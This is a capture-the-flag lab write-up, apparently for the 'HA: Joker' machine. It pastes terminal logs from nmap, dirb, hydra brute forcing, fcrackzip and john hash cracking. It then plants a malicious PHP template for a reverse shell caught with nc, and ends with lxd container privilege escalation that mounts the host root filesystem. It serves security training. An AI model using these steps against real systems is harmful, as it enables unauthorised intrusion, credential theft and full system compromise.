Joker

IP: 10.10.218.223

Nmap scan results: root@LAPTOP-U5913CMD:/home/akshay# nmap -A -T4 10.10.218.223 Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-17 20:45 IST Nmap scan report for 10.10.218.223 Host is up (0.21s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 ad:20:1f:f4:33:1b:00:70:b3:85:cb:87:00:c4:f4:f7 (RSA) | 256 1b:f9:a8:ec:fd:35:ec:fb:04:d5:ee:2a:a1:7a:4f:78 (ECDSA) |_ 256 dc:d7:dd:6e:f6:71:1f:8c:2c:2c:a1:34:6d:29:99:20 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |http-title: HA: Joker 8080/tcp open http Apache httpd 2.4.29 | http-auth: | HTTP/1.1 401 Unauthorized\x0D | Basic realm=Please enter the password. |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: 401 Unauthorized No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=10/17%OT=22%CT=1%CU=40139%PV=Y%DS=2%DC=T%G=Y%TM=5F8B0A OS:A6%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=108%TI=Z%CI=I%II=I%TS=A)OP OS:S(O1=M505ST11NW6%O2=M505ST11NW6%O3=M505NNT11NW6%O4=M505ST11NW6%O5=M505ST OS:11NW6%O6=M505ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)EC OS:N(R=Y%DF=Y%T=40%W=6903%O=M505NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F= OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5( OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z% OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C OS:D=S)

Network Distance: 2 hops Service Info: Host: localhost; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 23/tcp) HOP RTT ADDRESS 1 200.22 ms 10.9.0.1 2 200.43 ms 10.10.218.223

2)What version of Apache is it? -> 2.4.29

1. What port on this machine not need to be authenticated by user and password? -> 80

2. There is a file on this port that seems to be secret, what is it? HINT: Extensions File, dirb command comes with a flag that append each word with this extensions. Try to use dirb with a file that contains some commons extensions in a web server.

So I got secret.txt -> secret.txt

1. There is another file which reveals information of the backend, what is it? This file can be .php file.

->phpinfo.php

6)When reading the secret file, We find with a conversation that seems contains at least two users and some keywords that can be intersting, what user do you think it is? -> joker

1. What port on this machine need to be authenticated by Basic Authentication Mechanism? -> 8080

root@LAPTOP-U5913CMD:/home/akshay# hydra -l joker -P /home/akshay/Downloads/rockyou.txt -s 8080 -f 10.10.218.223 http-get Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-10-17 20:55:57 [WARNING] You must supply the web page as an additional option or via -m, default path set to / [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task [DATA] attacking http-get://10.10.218.223:8080/ [8080][http-get] host: 10.10.218.223 login: joker password: hannah [STATUS] attack finished for 10.10.218.223 (valid pair found) 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-10-17 20:56:27 root@LAPTOP-U5913CMD:/home/akshay#

1. At this point we have one user and a url that needs to be aunthenticated, brute force it to get the password, what is that password? -> hannah

2. Yeah!! We got the user and password and we see a cms based blog. Now check for directories and files in this port. What directory looks like as admin directory? -> /administrator/

3. We need access to the administration of the site in order to get a shell, there is a backup file, What is this file? -> backup.zip

4. We have the backup file and now we should look for some information, for example database, configuration files, etc ... But the backup file seems to be encrypted. What is the password?

root@LAPTOP-U5913CMD:/home/akshay/Desktop/HAJokerCTF# fcrackzip -D -p /home/akshay/Downloads/rockyou.txt -u 'backup(1).zip'

PASSWORD FOUND!!!!: pw == hannah root@LAPTOP-U5913CMD:/home/akshay/Desktop/HAJokerCTF# unzip 'backup(1).zip' Archive: backup(1).zip [backup(1).zip] db/joomladb.sql password: inflating: db/joomladb.sql inflating: site/libraries/phpass/PasswordHash.php inflating: site/libraries/vendor/psr/log/Psr/Log/LoggerAwareInterface.php inflating: site/libraries/vendor/psr/log/Psr/Log/LoggerAwareTrait.php inflating: site/libraries/vendor/psr/log/Psr/Log/InvalidArgumentException.php inflating: site/libraries/vendor/psr/log/Psr/Log/AbstractLogger.php inflating: site/libraries/vendor/psr/log/Psr/Log/LoggerInterface.php inflating: site/libraries/vendor/psr/log/Psr/Log/LogLevel.php inflating: site/libraries/vendor/psr/log/Psr/Log/LoggerTrait.php inflating: site/libraries/vendor/psr/

INSERT INTO cc1gr_users VALUES (547,'Super Duper User','admin','[email protected]','$2y$10$b43UqoH5UpXokj2y9e/8U.LD8T3jEQCuxG2oHzALoJaj9M5unOcbG',0,1,'2019-10-08 12:00:15','2019-10-25 15:20:02','0','{"admin_style":"","admin_language":"","language":"","editor":"","helpsite":"","timezone":""}','0000-00-00 00:00:00',0,'','',0);

user:admin hash:$2y$10$b43UqoH5UpXokj2y9e/8U.LD8T3jEQCuxG2oHzALoJaj9M5unOcbG

root@LAPTOP-U5913CMD:/home/akshay/Desktop/HAJokerCTF/db# nano hash root@LAPTOP-U5913CMD:/home/akshay/Desktop/HAJokerCTF/db# john hash --wordlist=/home/akshay/Downloads/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (bcrypt [Blowfish 32/64 X3]) Cost 1 (iteration count) is 1024 for all loaded hashes Will run 12 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status abcd1234 (?) 1g 0:00:00:08 DONE (2020-10-17 21:19) 0.1239g/s 133.8p/s 133.8c/s 133.8C/s twilight..brownie Use the "--show" option to display all of the cracked passwords reliably Session completed root@LAPTOP-U5913CMD:/home/akshay/Desktop/HAJokerCTF/db#

password:abcd1234

Once we get into the joomla panel as superuser we can then go into the template section and then customize Beez3 and replace the index.php with malicious php script and wait for incoming connections.

We got a connection

root@LAPTOP-U5913CMD:/home/akshay/Desktop/HAJokerCTF/db# nc -nvlp 1234 Listening on 0.0.0.0 1234 Connection received on 10.10.218.223 39202 Linux ubuntu 4.15.0-55-generic #60-Ubuntu SMP Tue Jul 2 18:22:20 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux 09:04:48 up 51 min, 0 users, load average: 0.01, 0.02, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data),115(lxd) /bin/sh: 0: can't access tty; job control turned off $ id uid=33(www-data) gid=33(www-data) groups=33(www-data),115(lxd) $

1. This user belongs to a group that differs on your own group, What is this group? -> lxd

2. What is the name of the file in the /root directory? -> final.txt

www-data@ubuntu:/tmp$ wget http://10.10.156.248:1222/alpine-v3.12-x86_64-20201017_2243.tar.gz <6.248:1222/alpine-v3.12-x86_64-20201017_2243.tar.gz --2020-10-17 10:14:17-- http://10.10.156.248:1222/alpine-v3.12-x86_64-20201017_2243.tar.gz Connecting to 10.10.156.248:1222... failed: Connection refused. www-data@ubuntu:/tmp$ wget http://10.9.81.62:1222/alpine-v3.12-x86_64-20201017_2243.tar.gz <81.62:1222/alpine-v3.12-x86_64-20201017_2243.tar.gz --2020-10-17 10:14:54-- http://10.9.81.62:1222/alpine-v3.12-x86_64-20201017_2243.tar.gz Connecting to 10.9.81.62:1222... connected. HTTP request sent, awaiting response... 200 OK Length: 3175707 (3.0M) [application/gzip Saving to: 'alpine-v3.12-x86_64-20201017_2243.tar.gz'

alpine-v3.12-x86_64 100%[===================>] 3.03M 455KB/s in 10s

2020-10-17 10:15:05 (302 KB/s) - 'alpine-v3.12-x86_64-20201017_2243.tar.gz' saved [3175707/3175707]

www-data@ubuntu:/tmp$ ls ls alpine-v3.12-x86_64-20201017_2243.tar.gz www-data@ubuntu:/tmp$ lxc image import ./alpine-v3.12-x86_64-20201017_2243.tar.gz

www-data@ubuntu:/tmp$ lxc image list lxc image list +-------+--------------+--------+-------------------------------+--------+--------+------------------------------+ | ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE | +-------+--------------+--------+-------------------------------+--------+--------+------------------------------+ | | ed4dcd2f38da | no | alpine v3.12 (20201017_22:43) | x86_64 | 3.03MB | Oct 17, 2020 at 5:16pm (UTC) | +-------+--------------+--------+-------------------------------+--------+--------+------------------------------+

www-data@ubuntu:/tmp$ lxc init ed4dcd2f38da ignite -c security.privileged=true <nit ed4dcd2f38da ignite -c security.privileged=true Creating ignite www-data@ubuntu:/tmp$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true <ydevice disk source=/ path=/mnt/root recursive=true Device mydevice added to ignite www-data@ubuntu:/tmp$ lxc start ignite lxc start ignite www-data@ubuntu:/tmp$ lxc exec ignite /bin/sh lxc exec ignite /bin/sh ~ # ^[[34;5Rid id uid=0(root) gid=0(root)

cd root s /mnt/root/root # ^[[34;18Rls final.txt /mnt/root/root # ^[[34;18Rcat final.txt cat final.txt

██ ██║██║ ██║██╔═██╗ ██╔══╝ ██╔══██╗ ╚█████╔╝╚██████╔╝██║ ██╗███████╗██║ ██║ ╚════╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝

!! Congrats you have finished this task !!

Contact us here:

Hacking Articles : https://twitter.com/rajchandel/ Aarti Singh: https://in.linkedin.com/in/aarti-singh-353698114

+-+-+-+-+-+ +-+-+-+-+-+-+-+ |E|n|j|o|y| |H|A|C|K|I|N|G| +-+-+-+-+-+ +-+-+-+-+-+-+-+ /mnt/root/root #

-Voker2311